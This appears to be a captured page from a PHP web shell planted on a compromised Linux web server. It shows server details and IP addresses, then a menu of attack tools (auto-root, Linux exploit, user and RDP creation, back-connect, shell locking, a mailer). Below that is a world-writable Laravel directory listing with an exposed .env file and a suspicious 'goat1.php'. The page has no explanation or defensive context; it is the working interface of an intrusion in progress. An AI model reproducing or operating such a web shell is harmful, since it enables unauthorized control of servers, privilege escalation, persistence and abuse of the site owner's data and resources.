Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo11.com /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.editorconfig
258
B
-rw-rw-rw-
.env
1.5
KB
-rw-rw-rw-
.env.example
1.04
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
243
B
-rw-rw-rw-
.htaccess
127
B
-r--r--r--
README.md
4.06
KB
-rw-rw-rw-
artisan
1.65
KB
-rw-rw-rw-
composer.json
2.9
KB
-rw-rw-rw-
composer.lock
413.08
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
package.json
226
B
-rw-rw-rw-
phpunit.xml
1.12
KB
-rw-rw-rw-
server.php
584
B
-rw-rw-rw-
vite.config.js
263
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.php
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ $uri = urldecode( parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) ); // This file allows us to emulate Apache's "mod_rewrite" functionality from the // built-in PHP web server. This provides a convenient way to test a Laravel // application without having installed a "real" web server software here. if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) { return false; } require_once __DIR__.'/public/index.php';
Close